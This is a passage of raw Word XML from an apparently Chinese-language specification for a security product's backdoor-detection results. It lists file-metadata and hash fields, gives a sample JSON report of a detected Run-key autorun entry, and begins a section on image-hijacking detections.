          <w:p w14:paraId="4BFB31A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EAC0657" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287C266D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DDAEFF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04BC8C55" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50EEC57E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="731B4A49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FDD8B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D6FCA9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50AA9A7D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50603B32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16CBCE59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23B7F65D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637312F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5604BC3D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF59FAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58FB89C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E0D67B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009101F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F91B0EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EB65EC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="055DFB51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017F06CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0134BF0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69FD2A6C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="733D9F0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E0B4EE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32DEA898" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F69D4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C56E276" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30516BD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EA2110F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A754802" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30587395" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03A850B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3A9FB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="300DD09A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D08625D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B24906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DD0B5EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2D0E50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A8AF5BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00025C69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759FC836" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1CB8E609" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE04BE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29CC6144" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20BC35B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F654FF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4690D869" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5DA921" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302E4A3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AE27AFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D956000" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43EE86E0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DCB0A03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314BF513" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A05A787" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F8C6C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30B91D43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A45DAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "autorun_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "reg_path": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_path": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_md5": "b4884c9fe6c808cfcb48ca6c199815a9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "comand_line": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "attributes": 32,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "reg_value_name": "autorun",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "autoruns_type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_size": 88576,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ret_code": "0x00002000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "process_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_name": "Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_id": 2496,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "create_time": 1528191066,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_id": 2636,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "image_file_name": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_name": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "extend_ret_code": "0x05000000"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA4A27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="后门类型映像劫持"/>
      <w:bookmarkEnd w:id="253"/>
      <w:bookmarkEnd w:id="254"/>
      <w:r>
        <w:t>后门类型：映像劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB9C9F"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2189"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4849"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="53BDD14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0E47387" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4730CDF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365996D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FC1BA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="095EC72A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34134593" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6260E0A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39968496" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E69513F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75AE7AEC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="140B519B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11465565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5246AC01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C41718F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程信息，</w:t>
            </w:r>
            <w:hyperlink w:anchor="processinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>process_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37F02398" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41AEB93A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hijack_image_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6704CBE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0F0AA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62176E52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t xml:space="preserve">劫持的映像文件信息 </w:t>
            </w:r>
            <w:hyperlink w:anchor="hijackimageinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>hijack_image_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6304AD9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="129255F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hijacked_image_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F88CBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
